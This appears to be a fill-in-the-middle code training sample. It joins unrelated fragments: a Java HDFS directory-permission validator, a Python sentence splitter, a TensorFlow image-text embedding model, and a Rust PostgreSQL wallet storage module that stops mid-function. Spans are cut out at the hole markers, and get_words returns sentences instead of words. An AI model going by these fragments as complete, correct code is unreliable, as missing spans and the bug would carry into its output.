//private implementation protected void validateStageForWholeFileFormat(Stage.Context context, List<Stage.ConfigIssue> issues) { maxFileSize = 0; maxRecordsPerFile = 1; idleTimeout = "-1"; if (fileType != HdfsFileType.WHOLE_FILE) { issues.add( context.createConfigIssue( Groups.OUTPUT_FILES.name(), getConfigBeanPrefix() + "fileType", Errors.HADOOPFS_53, fileType, HdfsFileType.WHOLE_FILE.getLabel(), DataFormat.WHOLE_FILE.getLabel() ) ); } if (dataFormat != DataFormat.WHOLE_FILE) { issues.add( context.createConfigIssue( Groups.DATA_FORMAT.name(), getConfigBeanPrefix() + "dataFormat", Errors.HADOOPFS_60, dataFormat.name(), DataFormat.WHOLE_FILE.getLabel(), HdfsFileType.WHOLE_FILE.getLabel() ) ); } } protected boolean validateHadoopDir(final Stage.Context context, final String configName, final String configGroup, String dirPathTemplate, final List<Stage.ConfigIssue> issues) { if (!dirPathTemplate.startsWith("/")) { issues.add(context.createConfigIssue(configGroup, configName, Errors.HADOOPFS_40)); return false; } // User can opt out canary write to HDFS if(!hdfsPermissionCheck) { return true; } final AtomicBoolean ok = new AtomicBoolean(true); dirPathTemplate = (dirPathTemplate.isEmpty()) ? "/" : dirPathTemplate; try { final Path dir = new Path(dirPathTemplate); userUgi.doAs(new PrivilegedExceptionAction<Void>() { @Override public Void run() throws Exception { // Based on whether the target directory exists or not, we'll do different check if (!fs.exists(dir)) { // Target directory doesn't exists, we'll try to create directory a directory and then drop it Path workDir = dir; // We don't want to pollute HDFS with random directories, so we'll create exactly one directory under // another already existing directory on the template path. (e.g. if template is /a/b/c/d and only /a // exists, then we will create new dummy directory in /a during this test). while(!fs.exists(workDir)) { workDir = workDir.getParent(); } // Sub-directory to be created in existing directory workDir = new Path(workDir, "_sdc-dummy-" + UUID.randomUUID().toString()); try { if (fs.mkdirs(workDir)) { LOG.info("Creating dummy directory to validate permissions {}", workDir.toString()); fs.delete(workDir, true); ok.set(true); } else { issues.add(context.createConfigIssue(configGroup, configName, Errors.HADOOPFS_41)); ok.set(false); } } catch (IOException ex) { issues.add(context.createConfigIssue(configGroup, configName, Errors.HADOOPFS_42, ex.toString())); ok.set(false); } } else { // Target directory exists, we will just create empty test file and then immediately drop it try { Path dummy = new Path(dir, "_sdc-dummy-" + UUID.randomUUID().toString()); fs.create(dummy).close(); fs.delete(dummy, false); ok.set(true); } catch (IOException ex) { issues.add(context.createConfigIssue(configGroup, configName, Errors.HADOOPFS_43, ex.toString())); ok.set(false); } } return null; } }); } catch (Exception ex) { issues.add(context.createConfigIssue(configGroup, configName, Errors.HADOOPFS_44, ex.toString())); ok.set(false); } return ok.get(); } @Override protected FileSystem createFileSystem() throws Exception { try { return userUgi.doAs(new PrivilegedExceptionAction<FileSystem>() { @Override public FileSystem run() throws Exception { return FileSystem.newInstance(new URI(hdfsUri), hdfsConfiguration); } }); } catch (IOException ex) { throw ex; } catch (RuntimeException ex) { Throwable cause = ex.getCause(); if (cause instanceof Exception) { throw (Exception)cause; } throw ex; } } private void recoveryOldTempFile(Stage.Context context) throws IOException, InterruptedException { if(!context.isPreview() && dataFormat != DataFormat.WHOLE_FILE && !skipOldTempFileRecovery && !dirPathTemplateInHeader && context.getRunnerId() == 0) { userUgi.doAs((PrivilegedExceptionAction<Void>) () -> { getCurrentWriters().getWriterManager().handleAlreadyExistingFiles(); return null; }); } } }<|fim▁end|>
}
<|file_name|>get_words.py<|end_file_name|><|fim▁begin|># get_words.py # returns a list of words from the relevant lines of a speech # J. Hassler Thurston # RocHack Hackathon December 7, 2013 import csv import nltk def get_words(line_list): sentences = parse_to_sentences(line_list) #print sentences words = [nltk.word_tokenize(sent) for sent in sentences] return sentences # returns a list of sentences from the list of lines def parse_to_sentences(line_list):<|fim▁hole|> #print line_list sentence_list = [] for line in line_list: # insert the sentences into the list sentence_list.extend(line.split('.')) return sentence_list # exports the list of words to a CSV file (currently only exports sentences) def export_to_csv(word_list, filename): out = open(filename, 'w') #wr = csv.writer(out, quoting=csv.QUOTE_ALL) for sentence in word_list: out.write(sentence + '\n') out.close()<|fim▁end|>
<|file_name|>image_text_model.py<|end_file_name|><|fim▁begin|># Copyright 2019 Google LLC # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. from __future__ import division from __future__ import print_function from transformer_layers import TransformerBlock import tensorflow as tf def mean_pool(x, m): m = tf.cast(m, tf.float32) x = tf.multiply(x, tf.expand_dims(m, 2)) x = tf.reduce_sum(x, 1) / tf.reduce_sum(m, 1, keepdims=True) return x class RNN(object): def __init__(self, num_units): self.rnn_fw = tf.keras.layers.CuDNNLSTM(units=num_units // 2, return_sequences=True, go_backwards=False, name='rnn_fw') self.rnn_bw = tf.keras.layers.CuDNNLSTM(units=num_units // 2, return_sequences=True, go_backwards=False, name='rnn_bw') def forward(self, inputs, masks): def rnn_fn(x, m, rnn): x = rnn(x) # x = tf.reduce_max(x, 1) # max pooling # x = mean_pool(x, m) # mean pooling indices = tf.reduce_sum(m, 1, keepdims=True) - 1 x = tf.gather_nd(x, tf.cast(indices, tf.int32), batch_dims=1) return x lengths = tf.reduce_sum(tf.cast(masks, tf.int32), axis=1) masks = tf.cast(masks, tf.float32) inputs = tf.multiply(inputs, tf.expand_dims(masks, 2)) inputs_bw = tf.reverse_sequence(inputs, lengths, 1, 0) outputs_fw = rnn_fn(inputs, masks, self.rnn_fw) outputs_bw = rnn_fn(inputs_bw, masks, self.rnn_bw) outputs = tf.concat([outputs_fw, outputs_bw], axis=1) return outputs class Transformer(object): def __init__(self, num_units): self.hidden = tf.keras.layers.Dense(num_units) self.transformer = TransformerBlock(num_units, num_units * 4, num_layer=2) def forward(self, inputs, masks): masks = tf.cast(masks, tf.float32) inputs = tf.multiply(inputs, tf.expand_dims(masks, 2)) inputs = self.hidden(inputs) return self.transformer.forward(inputs, masks) class DAN(object): def __init__(self, num_units): self.hidden = tf.keras.layers.Dense(num_units, activation=tf.nn.relu) def forward(self, inputs, masks): masks = tf.cast(masks, tf.float32) inputs = tf.multiply(inputs, tf.expand_dims(masks, 2)) inputs = tf.reduce_sum(inputs, 1) / tf.reduce_sum(masks, 1, keepdims=True) return self.hidden(inputs) def get_text_encoder(encoder_type='rnn'): if encoder_type == 'rnn': return RNN elif encoder_type == 'trans': return Transformer elif encoder_type == 'dan': return DAN else: raise ValueError(encoder_type) class ImageTextEmbedding(object): def __init__(self, word_emb, encoder_dim, encoder_type='rnn', norm=True, drop_p=0.25, contrastive=False, margin=0.5, num_neg_sample=10, lambda1=1.0, lambda2=1.0, internal=True): self.word_emb = tf.Variable(tf.convert_to_tensor(word_emb), name="emb", trainable=True) self.text_encoder = get_text_encoder(encoder_type)(encoder_dim) self.text_feat_proj = tf.keras.layers.Dense(encoder_dim) self.img_feat_proj = tf.keras.layers.Dense(encoder_dim) self.dropout = tf.keras.layers.Dropout(drop_p) self.margin = margin self.num_neg_sample = num_neg_sample self.lambda1 = lambda1 self.lambda2 = lambda2 self.contrastive = contrastive self.internal = internal self.norm = norm # normalize the embedding self.text_outputs = [] def forward_img(self, img_inputs, training): x = self.img_feat_proj(img_inputs) if self.norm: x = tf.nn.l2_normalize(x, axis=-1) return self.dropout(x, training=training) def forward_text(self, text_inputs, text_masks, training): if len(text_inputs.get_shape()) == 2: x = tf.nn.embedding_lookup(self.word_emb, text_inputs) else: x = text_inputs self.text_outputs.append(mean_pool(x, text_masks)) x = self.text_encoder.forward(x, text_masks) self.text_outputs.append(x) x = self.text_feat_proj(x) if self.norm: x = tf.nn.l2_normalize(x, axis=-1) return self.dropout(x, training=training) def encode(self, img_inputs, text_inputs, text_masks, training): img_feats = self.forward_img(img_inputs, training) text_feats = self.forward_text(text_inputs, text_masks, training) return img_feats, text_feats def forward(self, img_inputs, text_inputs, text_masks, labels, training): img_feats, text_feats = self.encode(img_inputs, text_inputs, text_masks, training) if self.contrastive: loss = contrastive_loss(img_feats, text_feats, self.margin) sent_im_dist = - similarity_fn(text_feats, img_feats) elif self.internal: loss = internal_loss(img_feats, text_feats, labels) sent_im_dist = - similarity_fn(text_feats, img_feats) else: loss = embedding_loss(img_feats, text_feats, labels, self.margin, self.num_neg_sample, self.lambda1, self.lambda2) sent_im_dist = pdist(text_feats, img_feats) rec = recall_k(sent_im_dist, labels, ks=[1, 5, 10]) return loss, rec def order_sim(im, s): im = tf.expand_dims(im, 0) s = tf.expand_dims(s, 1) diff = tf.clip_by_value(s - im, 0, 1e6) dist = tf.sqrt(tf.reduce_sum(diff ** 2, 2)) scores = -tf.transpose(dist) return scores def similarity_fn(im, s, order=False): if order: return order_sim(im, s) return tf.matmul(im, s, transpose_b=True) def internal_loss(im_embeds, sent_embeds, im_labels): logits_s = tf.matmul(sent_embeds, im_embeds, transpose_b=True) cost_s = tf.nn.softmax_cross_entropy_with_logits_v2(im_labels, logits_s) logits_im = tf.matmul(im_embeds, sent_embeds, transpose_b=True) cost_im = tf.nn.softmax_cross_entropy_with_logits_v2(tf.transpose(im_labels), logits_im) return tf.reduce_mean(cost_s) + tf.reduce_mean(cost_im) def contrastive_loss(im_embeds, sent_embeds, margin, max_violation=True): """ modified https://github.com/fartashf/vsepp/blob/master/model.py#L260 """ scores = similarity_fn(im_embeds, sent_embeds) batch_size = tf.shape(im_embeds)[0] diagonal = tf.diag_part(scores) d1 = tf.reshape(diagonal, (batch_size, 1)) d2 = tf.reshape(diagonal, (1, batch_size)) cost_s = tf.clip_by_value(margin + scores - d1, 0, 1e6) cost_im = tf.clip_by_value(margin + scores - d2, 0, 1e6) zeros = tf.zeros(batch_size) cost_s = tf.matrix_set_diag(cost_s, zeros) cost_im = tf.matrix_set_diag(cost_im, zeros) if max_violation: cost_s = tf.reduce_max(cost_s, 1) cost_im = tf.reduce_max(cost_im, 0) return tf.reduce_sum(cost_s) + tf.reduce_sum(cost_im) def pdist(x1, x2): """ x1: Tensor of shape (h1, w) x2: Tensor of shape (h2, w) Return pairwise distance for each row vector in x1, x2 as a Tensor of shape (h1, h2) """ x1_square = tf.reshape(tf.reduce_sum(x1 * x1, axis=1), [-1, 1]) x2_square = tf.reshape(tf.reduce_sum(x2 * x2, axis=1), [1, -1])<|fim▁hole|> def embedding_loss(im_embeds, sent_embeds, im_labels, margin, num_neg_sample, lambda1, lambda2): """ im_embeds: (b, 512) image embedding tensors sent_embeds: (sample_size * b, 512) sentence embedding tensors where the order of sentence corresponds to the order of images and setnteces for the same image are next to each other im_labels: (sample_size * b, b) boolean tensor, where (i, j) entry is True if and only if sentence[i], image[j] is a positive pair """ im_labels = tf.cast(im_labels, tf.bool) # compute embedding loss num_img = tf.shape(im_embeds)[0] num_sent = tf.shape(sent_embeds)[0] sent_im_ratio = tf.div(num_sent, num_img) sent_im_dist = pdist(sent_embeds, im_embeds) # image loss: sentence, positive image, and negative image pos_pair_dist = tf.reshape(tf.boolean_mask(sent_im_dist, im_labels), [num_sent, 1]) neg_pair_dist = tf.reshape(tf.boolean_mask(sent_im_dist, ~im_labels), [num_sent, -1]) im_loss = tf.clip_by_value(margin + pos_pair_dist - neg_pair_dist, 0, 1e6) im_loss = tf.reduce_mean(tf.nn.top_k(im_loss, k=num_neg_sample)[0]) # sentence loss: image, positive sentence, and negative sentence neg_pair_dist = tf.reshape( tf.boolean_mask(tf.transpose(sent_im_dist), ~tf.transpose(im_labels)), [num_img, -1]) neg_pair_dist = tf.reshape( tf.tile(neg_pair_dist, [1, sent_im_ratio]), [num_sent, -1]) sent_loss = tf.clip_by_value(margin + pos_pair_dist - neg_pair_dist, 0, 1e6) sent_loss = tf.reduce_mean(tf.nn.top_k(sent_loss, k=num_neg_sample)[0]) # sentence only loss (neighborhood-preserving constraints) sent_sent_dist = pdist(sent_embeds, sent_embeds) sent_sent_mask = tf.reshape(tf.tile(tf.transpose(im_labels), [1, sent_im_ratio]), [num_sent, num_sent]) pos_pair_dist = tf.reshape(tf.boolean_mask(sent_sent_dist, sent_sent_mask), [-1, sent_im_ratio]) pos_pair_dist = tf.reduce_max(pos_pair_dist, axis=1, keep_dims=True) neg_pair_dist = tf.reshape(tf.boolean_mask(sent_sent_dist, ~sent_sent_mask), [num_sent, -1]) sent_only_loss = tf.clip_by_value(margin + pos_pair_dist - neg_pair_dist, 0, 1e6) sent_only_loss = tf.reduce_mean(tf.nn.top_k(sent_only_loss, k=num_neg_sample)[0]) loss = im_loss * lambda1 + sent_loss + sent_only_loss * lambda2 return loss def recall_k(sent_im_dist, im_labels, ks=(1, 5, 10)): """ Compute recall at given ks. """ im_labels = tf.cast(im_labels, tf.bool) def retrieval_recall(dist, labels, k): # Use negative distance to find the index of # the smallest k elements in each row. pred = tf.nn.top_k(-dist, k=k)[1] # Create a boolean mask for each column (k value) in pred, # s.t. mask[i][j] is 1 iff pred[i][k] = j. pred_k_mask = lambda topk_idx: tf.one_hot(topk_idx, tf.shape(labels)[1], on_value=True, off_value=False, dtype=tf.bool) # Create a boolean mask for the predicted indices # by taking logical or of boolean masks for each column, # s.t. mask[i][j] is 1 iff j is in pred[i]. pred_mask = tf.reduce_any(tf.map_fn( pred_k_mask, tf.transpose(pred), dtype=tf.bool), axis=0) # pred_mask = tf.map_fn(create_pred_mask, pred) # Entry (i, j) is matched iff pred_mask[i][j] and labels[i][j] are 1. matched = tf.cast(tf.logical_and(pred_mask, labels), dtype=tf.float32) return tf.reduce_mean(tf.reduce_max(matched, axis=1)) img_sent_recall = [retrieval_recall(tf.transpose(sent_im_dist), tf.transpose(im_labels), k) for k in ks] sent_img_recall = [retrieval_recall(sent_im_dist, im_labels, k) for k in ks] return img_sent_recall + sent_img_recall<|fim▁end|>
return tf.sqrt(x1_square - 2 * tf.matmul(x1, tf.transpose(x2)) + x2_square + 1e-4)
<|file_name|>postgres_storage.rs<|end_file_name|><|fim▁begin|>extern crate owning_ref; extern crate sodiumoxide; extern crate r2d2; extern crate r2d2_postgres; use postgres; use self::r2d2_postgres::{TlsMode, PostgresConnectionManager}; use serde_json; use self::owning_ref::OwningHandle; use std::rc::Rc; use std::time::Duration; use errors::wallet::WalletStorageError; use errors::common::CommonError; use wql::language; use wql::query; use wql::transaction; use wql::storage::{StorageIterator, WalletStorage, StorageRecord, EncryptedValue, Tag, TagName}; fn default_true() -> bool { true } fn default_false() -> bool { false } #[derive(Debug, Serialize, Deserialize, PartialEq)] #[serde(rename_all = "camelCase")] pub struct RecordOptions { #[serde(default = "default_false")] retrieve_type: bool, #[serde(default = "default_true")] retrieve_value: bool, #[serde(default = "default_false")] retrieve_tags: bool } impl RecordOptions { pub fn id() -> String { let options = RecordOptions { retrieve_type: false, retrieve_value: false, retrieve_tags: false }; serde_json::to_string(&options).unwrap() } pub fn id_value() -> String { let options = RecordOptions { retrieve_type: false, retrieve_value: true, retrieve_tags: false }; serde_json::to_string(&options).unwrap() } } impl Default for RecordOptions { fn default() -> RecordOptions { RecordOptions { retrieve_type: false, retrieve_value: true, retrieve_tags: false, } } } #[derive(Debug, Serialize, Deserialize, PartialEq)] #[serde(rename_all = "camelCase")] pub struct SearchOptions { #[serde(default = "default_true")] retrieve_records: bool, #[serde(default = "default_false")] retrieve_total_count: bool, #[serde(default = "default_false")] retrieve_type: bool, #[serde(default = "default_true")] retrieve_value: bool, #[serde(default = "default_false")] retrieve_tags: bool } impl SearchOptions { pub fn id_value() -> String { let options = SearchOptions { retrieve_records: true, retrieve_total_count: true, retrieve_type: true, retrieve_value: true, retrieve_tags: false }; serde_json::to_string(&options).unwrap() } } impl Default for SearchOptions { fn default() -> SearchOptions { SearchOptions { retrieve_records: true, retrieve_total_count: false, retrieve_type: false, retrieve_value: true, retrieve_tags: false, } } } const _POSTGRES_DB: &str = "postgres"; const _PLAIN_TAGS_QUERY: &str = "SELECT name, value from tags_plaintext where item_id = $1"; const _ENCRYPTED_TAGS_QUERY: &str = "SELECT name, value from tags_encrypted where item_id = $1"; const _CREATE_WALLET_DATABASE: &str = "CREATE DATABASE $1"; const _CREATE_SCHEMA: [&str; 12] = [ "CREATE TABLE IF NOT EXISTS metadata ( id BIGSERIAL PRIMARY KEY, value BYTEA NOT NULL )", "CREATE UNIQUE INDEX IF NOT EXISTS ux_metadata_values ON metadata(value)", "CREATE TABLE IF NOT EXISTS items( id BIGSERIAL PRIMARY KEY, type BYTEA NOT NULL, name BYTEA NOT NULL, value BYTEA NOT NULL, key BYTEA NOT NULL )", "CREATE UNIQUE INDEX IF NOT EXISTS ux_items_type_name ON items(type, name)", "CREATE TABLE IF NOT EXISTS tags_encrypted( name BYTEA NOT NULL, value BYTEA NOT NULL, item_id BIGINT NOT NULL, PRIMARY KEY(name, item_id), FOREIGN KEY(item_id) REFERENCES items(id) ON DELETE CASCADE ON UPDATE CASCADE )", "CREATE INDEX IF NOT EXISTS ix_tags_encrypted_name ON tags_encrypted(name)", "CREATE INDEX IF NOT EXISTS ix_tags_encrypted_value ON tags_encrypted(value)", "CREATE INDEX IF NOT EXISTS ix_tags_encrypted_item_id ON tags_encrypted(item_id)", "CREATE TABLE IF NOT EXISTS tags_plaintext( name BYTEA NOT NULL, value TEXT NOT NULL, item_id BIGINT NOT NULL, PRIMARY KEY(name, item_id), FOREIGN KEY(item_id) REFERENCES items(id) ON DELETE CASCADE ON UPDATE CASCADE )", "CREATE INDEX IF NOT EXISTS ix_tags_plaintext_name ON tags_plaintext(name)", "CREATE INDEX IF NOT EXISTS ix_tags_plaintext_value ON tags_plaintext(value)", "CREATE INDEX IF NOT EXISTS ix_tags_plaintext_item_id ON tags_plaintext(item_id)" ]; const _DROP_WALLET_DATABASE: &str = "DROP DATABASE $1"; const _DROP_SCHEMA: [&str; 4] = [ "DROP TABLE tags_plaintext", "DROP TABLE tags_encrypted", "DROP TABLE items", "DROP TABLE metadata" ]; #[derive(Debug)] struct TagRetriever<'a> { plain_tags_stmt: postgres::stmt::Statement<'a>, encrypted_tags_stmt: postgres::stmt::Statement<'a>, } type TagRetrieverOwned = OwningHandle<Rc<r2d2::PooledConnection<PostgresConnectionManager>>, Box<TagRetriever<'static>>>; impl<'a> TagRetriever<'a> { fn new_owned(conn: Rc<r2d2::PooledConnection<PostgresConnectionManager>>) -> Result<TagRetrieverOwned, WalletStorageError> { OwningHandle::try_new(conn.clone(), |conn| -> Result<_, postgres::Error> { let (plain_tags_stmt, encrypted_tags_stmt) = unsafe { ((*conn).prepare(_PLAIN_TAGS_QUERY)?, (*conn).prepare(_ENCRYPTED_TAGS_QUERY)?) }; let tr = TagRetriever { plain_tags_stmt, encrypted_tags_stmt, }; Ok(Box::new(tr)) }).map_err(WalletStorageError::from) } fn retrieve(&mut self, id: i64) -> Result<Vec<Tag>, WalletStorageError> { let mut tags = Vec::new(); let plain_results = self.plain_tags_stmt.query(&[&id])?; let mut iter_plain = plain_results.iter(); while let Some(res) = iter_plain.next() { let row = res; tags.push(Tag::PlainText(row.get(0), row.get(1))); } let encrypted_results = self.encrypted_tags_stmt.query(&[&id])?; let mut iter_encrypted = encrypted_results.iter(); while let Some(res) = iter_encrypted.next() { let row = res; tags.push(Tag::Encrypted(row.get(0), row.get(1))); } Ok(tags) } } struct PostgresStorageIterator { rows: Option< OwningHandle< OwningHandle< Rc<r2d2::PooledConnection<PostgresConnectionManager>>, Box<postgres::stmt::Statement<'static>>>, Box<postgres::rows::Rows<>>>>, tag_retriever: Option<TagRetrieverOwned>, options: RecordOptions, total_count: Option<usize>, iter_count: usize, } impl PostgresStorageIterator { fn new(stmt: Option<OwningHandle<Rc<r2d2::PooledConnection<PostgresConnectionManager>>, Box<postgres::stmt::Statement<'static>>>>, args: &[&postgres::types::ToSql], options: RecordOptions, tag_retriever: Option<TagRetrieverOwned>, total_count: Option<usize>) -> Result<PostgresStorageIterator, WalletStorageError> { let mut iter = PostgresStorageIterator { rows: None, tag_retriever, options, total_count, iter_count: 0 }; if let Some(stmt) = stmt { iter.rows = Some(OwningHandle::try_new( stmt, |stmt| unsafe { (*(stmt as *mut postgres::stmt::Statement)).query(args).map(Box::new) }, )?); } Ok(iter) } } impl StorageIterator for PostgresStorageIterator { fn next(&mut self) -> Result<Option<StorageRecord>, WalletStorageError> { // if records are not requested. if self.rows.is_none() { return Ok(None); } // TODO not sure if iter().nth() is the most efficient way to iterate through the result set // TODO investigate if the Iter object can be cached between calls to next() match self.rows.as_mut().unwrap().iter().nth(self.iter_count) { Some(row) => { self.iter_count = self.iter_count + 1; let name = row.get(1); let value = if self.options.retrieve_value { Some(EncryptedValue::new(row.get(2), row.get(3))) } else { None }; let tags = if self.options.retrieve_tags { match self.tag_retriever { Some(ref mut tag_retriever) => Some(tag_retriever.retrieve(row.get(0))?), None => return Err(WalletStorageError::CommonError( CommonError::InvalidState("Fetch tags option set and tag retriever is None".to_string()) )) } } else { None }; let type_ = if self.options.retrieve_type { Some(row.get(4)) } else { None }; Ok(Some(StorageRecord::new(name, value, type_, tags))) } //Some(Err(err)) => Err(WalletStorageError::from(err)), None => Ok(None) } } fn get_total_count(&self) -> Result<Option<usize>, WalletStorageError> { Ok(self.total_count) } } #[derive(Deserialize, Debug)] pub struct PostgresConfig { url: String, // TODO add additional configuration options tls: Option<String>, // default off max_connections: Option<String>, // default 2 min_idle_tim: Option<String>, // default 0 connection_timeout: Option<String>, // default 5 } #[derive(Deserialize, Debug)] pub struct PostgresCredentials { account: String, password: String, admin_account: Option<String>, admin_password: Option<String>, } #[derive(Debug)] pub struct PostgresStorage { pool: r2d2::Pool<PostgresConnectionManager>, } pub trait WalletStorageType { fn create_storage(&self, id: &str, config: Option<&str>, credentials: Option<&str>, metadata: &[u8]) -> Result<(), WalletStorageError>; fn open_storage(&self, id: &str, config: Option<&str>, credentials: Option<&str>) -> Result<Box<PostgresStorage>, WalletStorageError>; fn delete_storage(&self, id: &str, config: Option<&str>, credentials: Option<&str>) -> Result<(), WalletStorageError>; } pub struct PostgresStorageType {} impl PostgresStorageType { pub fn new() -> PostgresStorageType { PostgresStorageType {} } fn _admin_postgres_url(config: &PostgresConfig, credentials: &PostgresCredentials) -> String { let mut url_base = "postgresql://".to_owned(); match credentials.admin_account { Some(ref account) => url_base.push_str(&account[..]), None => () } url_base.push_str(":"); match credentials.admin_password { Some(ref password) => url_base.push_str(&password[..]), None => () } url_base.push_str("@"); url_base.push_str(&config.url[..]); url_base } fn _base_postgres_url(config: &PostgresConfig, credentials: &PostgresCredentials) -> String { let mut url_base = "postgresql://".to_owned(); url_base.push_str(&credentials.account[..]); url_base.push_str(":"); url_base.push_str(&credentials.password[..]); url_base.push_str("@"); url_base.push_str(&config.url[..]); url_base } fn _postgres_url(id: &str, config: &PostgresConfig, credentials: &PostgresCredentials) -> String { let mut url_base = PostgresStorageType::_base_postgres_url(config, credentials); url_base.push_str("/"); url_base.push_str(id); url_base } } impl WalletStorage for PostgresStorage { /// /// Tries to fetch values and/or tags from the storage. /// Returns Result with StorageEntity object which holds requested data in case of success or /// Result with WalletStorageError in case of failure. /// /// /// # Arguments /// /// * `type_` - type_ of the item in storage /// * `id` - id of the item in storage /// * `options` - JSon containing what needs to be fetched. /// Example: {"retrieveValue": true, "retrieveTags": true} /// /// # Returns /// /// Result that can be either: /// /// * `StorageEntity` - Contains name, optional value and optional tags /// * `WalletStorageError` /// /// # Errors /// /// Any of the following `WalletStorageError` type_ of errors can be throw by this method: /// /// * `WalletStorageError::Closed` - Storage is closed /// * `WalletStorageError::ItemNotFound` - Item is not found in database /// * `IOError("IO error during storage operation:...")` - Failed connection or SQL query /// fn get(&self, type_: &[u8], id: &[u8], options: &str) -> Result<StorageRecord, WalletStorageError> { let options: RecordOptions = if options == "{}" { // FIXME: RecordOptions::default() } else { serde_json::from_str(options)? }; let pool = self.pool.clone(); let conn = pool.get().unwrap(); let res: Result<(i64, Vec<u8>, Vec<u8>), WalletStorageError> = { let mut rows = conn.query( "SELECT id, value, key FROM items where type = $1 AND name = $2", &[&type_.to_vec(), &id.to_vec()]); match rows.as_mut().unwrap().iter().next() { Some(row) => Ok((row.get(0), row.get(1), row.get(2))), None => Err(WalletStorageError::ItemNotFound) } }; let item = match res { Ok(entity) => entity, Err(WalletStorageError::ItemNotFound) => return Err(WalletStorageError::ItemNotFound), Err(err) => return Err(WalletStorageError::from(err)) }; let value = if options.retrieve_value { Some(EncryptedValue::new(item.1, item.2)) } else { None }; let type_ = if options.retrieve_type { Some(type_.clone()) } else { None }; let tags = if options.retrieve_tags { let mut tags = Vec::new(); // get all encrypted. let mut stmt = conn.prepare_cached("SELECT name, value FROM tags_encrypted WHERE item_id = $1")?; let mut rows = stmt.query(&[&item.0])?; let mut iter = rows.iter(); while let Some(res) = iter.next() { let row = res; //let tag_name: Vec<u8> = row.get(0); //let tag_value: Vec<u8> = row.get(1); tags.push(Tag::Encrypted(row.get(0), row.get(1))); } // get all plain let mut stmt = conn.prepare_cached("SELECT name, value FROM tags_plaintext WHERE item_id = $1")?; let mut rows = stmt.query(&[&item.0])?; let mut iter = rows.iter(); while let Some(res) = iter.next() { let row = res; //let tag_name: Vec<u8> = row.get(0); //let tag_value: String = row.get(1); tags.push(Tag::PlainText(row.get(0), row.get(1))); } Some(tags) } else { None }; Ok(StorageRecord::new(id.to_vec(), value, type_.map(|val| val.to_vec()), tags)) } /// /// inserts value and tags into storage. /// Returns Result with () on success or /// Result with WalletStorageError in case of failure. /// /// /// # Arguments /// /// * `type_` - type of the item in storage /// * `id` - id of the item in storage /// * `value` - value of the item in storage /// * `value_key` - key used to encrypt the value /// * `tags` - tags assigned to the value /// /// # Returns /// /// Result that can be either: /// /// * `()` /// * `WalletStorageError` /// /// # Errors /// /// Any of the following `WalletStorageError` class of errors can be throw by this method: /// /// * `WalletStorageError::Closed` - Storage is closed /// * `WalletStorageError::ItemAlreadyExists` - Item is already present in database /// * `IOError("IO error during storage operation:...")` - Failed connection or SQL query /// fn add(&self, type_: &[u8], id: &[u8], value: &EncryptedValue, tags: &[Tag]) -> Result<(), WalletStorageError> { let pool = self.pool.clone(); let conn = pool.get().unwrap(); let tx: transaction::Transaction = transaction::Transaction::new(&conn)?; let res = tx.prepare_cached("INSERT INTO items (type, name, value, key) VALUES ($1, $2, $3, $4) RETURNING id")? .query(&[&type_.to_vec(), &id.to_vec(), &value.data, &value.key]); let item_id = match res { Ok(rows) => { let res = match rows.iter().next() { Some(row) => Ok(row.get(0)), None => Err(WalletStorageError::ItemNotFound) }; let item_id: i64 = match res { Err(WalletStorageError::ItemNotFound) => return Err(WalletStorageError::ItemNotFound), Err(err) => return Err(WalletStorageError::from(err)), Ok(id) => id }; item_id }, Err(err) => { if err.code() == Some(&postgres::error::UNIQUE_VIOLATION) || err.code() == Some(&postgres::error::INTEGRITY_CONSTRAINT_VIOLATION) { return Err(WalletStorageError::ItemAlreadyExists); } else { return Err(WalletStorageError::from(err)); } } }; let item_id = item_id as i64; if !tags.is_empty() { let stmt_e = tx.prepare_cached("INSERT INTO tags_encrypted (item_id, name, value) VALUES ($1, $2, $3)")?; let stmt_p = tx.prepare_cached("INSERT INTO tags_plaintext (item_id, name, value) VALUES ($1, $2, $3)")?; for tag in tags { match tag { &Tag::Encrypted(ref tag_name, ref tag_data) => { match stmt_e.execute(&[&item_id, tag_name, tag_data]) { Ok(_) => (), Err(err) => { if err.code() == Some(&postgres::error::UNIQUE_VIOLATION) || err.code() == Some(&postgres::error::INTEGRITY_CONSTRAINT_VIOLATION) { return Err(WalletStorageError::ItemAlreadyExists); } else { return Err(WalletStorageError::from(err)); } } } }, &Tag::PlainText(ref tag_name, ref tag_data) => { match stmt_p.execute(&[&item_id, tag_name, tag_data]) { Ok(_) => (), Err(err) => { if err.code() == Some(&postgres::error::UNIQUE_VIOLATION) || err.code() == Some(&postgres::error::INTEGRITY_CONSTRAINT_VIOLATION) { return Err(WalletStorageError::ItemAlreadyExists); } else { return Err(WalletStorageError::from(err)); } } } } }; } } tx.commit()?; Ok(()) } fn update(&self, type_: &[u8], id: &[u8], value: &EncryptedValue) -> Result<(), WalletStorageError> { let pool = self.pool.clone(); let conn = pool.get().unwrap(); let res = conn.prepare_cached("UPDATE items SET value = $1, key = $2 WHERE type = $3 AND name = $4")? .execute(&[&value.data, &value.key, &type_.to_vec(), &id.to_vec()]); match res { Ok(1) => Ok(()), Ok(0) => Err(WalletStorageError::ItemNotFound), Ok(count) => Err(WalletStorageError::CommonError(CommonError::InvalidState(format!("SQLite returned update row count: {}", count)))), Err(err) => Err(WalletStorageError::from(err)), } } fn add_tags(&self, type_: &[u8], id: &[u8], tags: &[Tag]) -> Result<(), WalletStorageError> { let pool = self.pool.clone(); let conn = pool.get().unwrap(); let tx: transaction::Transaction = transaction::Transaction::new(&conn)?; let res = { let mut rows = tx.prepare_cached("SELECT id FROM items WHERE type = $1 AND name = $2")? .query(&[&type_.to_vec(), &id.to_vec()]); match rows.as_mut().unwrap().iter().next() { Some(row) => Ok(row.get(0)), None => Err(WalletStorageError::ItemNotFound) } }; let item_id: i64 = match res { Err(WalletStorageError::ItemNotFound) => return Err(WalletStorageError::ItemNotFound), Err(err) => return Err(WalletStorageError::from(err)), Ok(id) => id }; if !tags.is_empty() { let enc_tag_insert_stmt = tx.prepare_cached("INSERT INTO tags_encrypted (item_id, name, value) VALUES ($1, $2, $3) ON CONFLICT (name, item_id) DO UPDATE SET value = excluded.value")?; let plain_tag_insert_stmt = tx.prepare_cached("INSERT INTO tags_plaintext (item_id, name, value) VALUES ($1, $2, $3) ON CONFLICT (name, item_id) DO UPDATE SET value = excluded.value")?; for tag in tags { match 